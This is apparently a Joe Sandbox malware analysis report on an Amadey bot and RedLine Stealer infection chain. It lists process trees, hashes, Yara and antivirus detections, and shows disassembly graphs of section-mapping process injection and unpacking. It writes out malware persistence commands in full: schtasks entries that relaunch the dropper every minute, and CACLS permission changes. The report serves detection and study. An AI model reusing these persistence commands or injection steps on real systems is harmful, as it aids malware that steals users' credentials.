                                                                                                                                                                                    Start time:08:58:31
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\8C99.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\8C99.exe
                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                    File size:250368 bytes
                                                                                                                                                                                    MD5 hash:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.497085000.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.497186202.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.496822536.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.523347710.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.497313397.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\8C99.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 77%, ReversingLabs

                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                    Start time:08:58:32
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    Imagebase:0x1170000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.569124856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.576692598.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.499169836.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                    Start time:08:58:33
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\8FF5.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\8FF5.exe
                                                                                                                                                                                    Imagebase:0x2f0000
                                                                                                                                                                                    File size:250368 bytes
                                                                                                                                                                                    MD5 hash:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000000.501595040.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.523361261.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000000.499470322.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000000.499779056.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000000.499951852.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\8FF5.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 77%, ReversingLabs

                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                    Start time:08:58:34
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                    Start time:08:58:35
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:CACLS "..\cb465ca805" /P "user:N"
                                                                                                                                                                                    Imagebase:0x180000
                                                                                                                                                                                    File size:27648 bytes
                                                                                                                                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                    Start time:08:58:38
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:CACLS "..\cb465ca805" /P "user:R" /E
                                                                                                                                                                                    Imagebase:0x180000
                                                                                                                                                                                    File size:27648 bytes
                                                                                                                                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                    Start time:08:58:39
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                                                                                                                                                                    Imagebase:0x340000
                                                                                                                                                                                    File size:250368 bytes
                                                                                                                                                                                    MD5 hash:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000002.523815460.0000000000341000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000000.513749349.0000000000341000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 77%, ReversingLabs

                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                    Start time:08:58:39
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                                                                                                                                                                    Imagebase:0x340000
                                                                                                                                                                                    File size:250368 bytes
                                                                                                                                                                                    MD5 hash:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000026.00000002.843894856.000000000098A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000026.00000002.847247347.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000026.00000002.846974076.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000026.00000003.719800807.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000026.00000002.839241764.0000000000341000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000026.00000000.513805010.0000000000341000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000026.00000003.720284634.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000026.00000002.845677508.00000000009C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                    Start time:08:58:39
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe"
                                                                                                                                                                                    Imagebase:0xde0000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:BC45F9797F848DF442A883F994ADAD4A
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000027.00000002.837962620.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000027.00000002.841905770.0000000000DE1000.00000020.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000027.00000000.514204840.0000000000DE1000.00000020.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 69%, ReversingLabs

                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                    Start time:08:58:40
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\AAE1.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AAE1.exe
                                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                                    File size:3909632 bytes
                                                                                                                                                                                    MD5 hash:A14001B42E3E4F1199A4DA5BECED8766
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000028.00000002.688050042.0000000004B4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\AAE1.exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 88%, ReversingLabs

                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                    Start time:08:58:45
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                    Imagebase:0x7ff683680000
                                                                                                                                                                                    File size:2851656 bytes
                                                                                                                                                                                    MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                    Start time:08:58:47
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1880,i,6220591727582463305,5376783925534799791,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff683680000
                                                                                                                                                                                    File size:2851656 bytes
                                                                                                                                                                                    MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                    Start time:08:58:48
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\CEE7.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\CEE7.exe
                                                                                                                                                                                    Imagebase:0xae0000
                                                                                                                                                                                    File size:3909632 bytes
                                                                                                                                                                                    MD5 hash:A14001B42E3E4F1199A4DA5BECED8766
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\CEE7.exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 88%, ReversingLabs

                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                    Start time:08:58:54
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" /F
                                                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                    Start time:08:58:55
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7c72c0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                    Start time:08:58:57
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe" /F
                                                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                    Start time:08:58:58
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7c72c0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                    Start time:08:58:58
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\5ca56b659f" /P "user:N"&&CACLS "..\5ca56b659f" /P "user:R" /E&&Exit
                                                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                    Start time:08:58:58
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7c72c0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                    Start time:08:59:02
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                    Imagebase:0x7ff683680000
                                                                                                                                                                                    File size:2851656 bytes
                                                                                                                                                                                    MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:3.1%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:77.2%
                                                                                                                                                                                      Signature Coverage:30.7%
                                                                                                                                                                                      Total number of Nodes:114
                                                                                                                                                                                      Total number of Limit Nodes:4
                                                                                                                                                                                      execution_graph 7403 402d40 7404 402d65 7403->7404 7405 401932 8 API calls 7404->7405 7406 402f37 7404->7406 7405->7406 7412 409b63 7415 409b27 7412->7415 7414 409b70 7416 409b33 __locking 7415->7416 7419 409a3c 7416->7419 7418 409b44 __locking 7418->7414 7421 409a50 __msize 7419->7421 7420 409ab8 7420->7418 7421->7420 7422 409aa2 7421->7422 7425 40b52e 7421->7425 7422->7420 7424 40b52e __realloc_crt __VEC_memcpy 7422->7424 7424->7420 7426 40b537 7425->7426 7428 40b576 7426->7428 7429 40f22d 7426->7429 7428->7422 7431 40f239 7 library calls 7429->7431 7430 40f240 __locking _realloc 7430->7426 7431->7430 7432 40cbc0 __VEC_memcpy _realloc 7431->7432 7432->7431 7468 401523 7469 401529 7468->7469 7470 401608 NtDuplicateObject 7469->7470 7479 401724 7469->7479 7471 401625 NtCreateSection 7470->7471 7470->7479 7472 4016a5 NtCreateSection 7471->7472 7473 40164b NtMapViewOfSection 7471->7473 7475 4016d1 7472->7475 7472->7479 7473->7472 7474 40166e NtMapViewOfSection 7473->7474 7474->7472 7476 40168c 7474->7476 7477 4016db NtMapViewOfSection 7475->7477 7475->7479 7476->7472 7478 401702 NtMapViewOfSection 7477->7478 7477->7479 7478->7479 7306 2d8003c 7307 2d80049 7306->7307 7319 2d80e0f SetErrorMode SetErrorMode 7307->7319 7312 2d80265 7313 2d802ce VirtualProtect 7312->7313 7315 2d8030b 7313->7315 7314 2d80439 VirtualFree 7318 2d804be LoadLibraryA 7314->7318 7315->7314 7317 2d808c7 7318->7317 7320 2d80223 7319->7320 7321 2d80d90 7320->7321 7322 2d80dad 7321->7322 7323 2d80dbb GetPEB 7322->7323 7324 2d80238 VirtualAlloc 7322->7324 7323->7324 7324->7312 7407 401749 7408 4016cf 7407->7408 7409 4016db NtMapViewOfSection 7408->7409 7411 401724 7408->7411 7410 401702 NtMapViewOfSection 7409->7410 7409->7411 7410->7411 7347 40a50e 7348 40a517 __malloc_crt 7347->7348 7349 40a51f 7348->7349 7351 40cbc0 7348->7351 7352 40cbd8 7351->7352 7353 40cbff __VEC_memcpy 7352->7353 7354 40cc07 7352->7354 7353->7354 7354->7349 7377 2d80001 7378 2d80005 7377->7378 7383 2d8092b GetPEB 7378->7383 7380 2d80030 7385 2d8003c 7380->7385 7384 2d80972 7383->7384 7384->7380 7386 2d80049 7385->7386 7387 2d80e0f 2 API calls 7386->7387 7388 2d80223 7387->7388 7389 2d80d90 GetPEB 7388->7389 7390 2d80238 VirtualAlloc 7389->7390 7391 2d80265 7390->7391 7392 2d802ce VirtualProtect 7391->7392 7394 2d8030b 7392->7394 7393 2d80439 VirtualFree 7397 2d804be LoadLibraryA 7393->7397 7394->7393 7396 2d808c7 7397->7396 7325 402e9b 7328 402ea1 7325->7328 7326 402f37 7328->7326 7329 401932 7328->7329 7330 401943 7329->7330 7331 401986 Sleep 7330->7331 7332 4019a1 7331->7332 7334 4019b2 7332->7334 7335 401558 7332->7335 7334->7326 7336 401567 7335->7336 7337 401608 NtDuplicateObject 7336->7337 7346 401724 7336->7346 7338 401625 NtCreateSection 7337->7338 7337->7346 7339 4016a5 NtCreateSection 7338->7339 7340 40164b NtMapViewOfSection 7338->7340 7342 4016d1 7339->7342 7339->7346 7340->7339 7341 40166e NtMapViewOfSection 7340->7341 7341->7339 7343 40168c 7341->7343 7344 4016db NtMapViewOfSection 7342->7344 7342->7346 7343->7339 7345 401702 NtMapViewOfSection 7344->7345 7344->7346 7345->7346 7346->7334 7398 2d80005 7399 2d8092b GetPEB 7398->7399 7400 2d80030 7399->7400 7401 2d8003c 7 API calls 7400->7401 7402 2d80038 7401->7402 7463 402d7d 7464 402d83 7463->7464 7466 402deb 7463->7466 7465 401932 8 API calls 7467 402f37 7465->7467 7466->7465 7466->7467 7480 40193d 7481 40196a 7480->7481 7482 401986 Sleep 7481->7482 7483 4019a1 7482->7483 7484 401558 7 API calls 7483->7484 7485 4019b2 7483->7485 7484->7485 7355 40a7bf HeapCreate 7356 40a7e3 7355->7356

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 85 401558-4015b2 call 4011f5 97 4015b4 85->97 98 4015b7-4015bc 85->98 97->98 100 4015c2-4015d3 98->100 101 4018d7-4018df 98->101 104 4018d5 100->104 105 4015d9-401602 100->105 101->98 106 4018e4-40192f call 4011f5 101->106 104->106 105->104 114 401608-40161f NtDuplicateObject 105->114 114->104 116 401625-401649 NtCreateSection 114->116 118 4016a5-4016cb NtCreateSection 116->118 119 40164b-40166c NtMapViewOfSection 116->119 118->104 121 4016d1-4016d5 118->121 119->118 120 40166e-40168a NtMapViewOfSection 119->120 120->118 123 40168c-4016a2 120->123 121->104 124 4016db-4016fc NtMapViewOfSection 121->124 123->118 124->104 126 401702-40171e NtMapViewOfSection 124->126 126->104 129 401724 126->129 129->104 131 401724 call 401729 129->131 131->104
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                      • String ID:
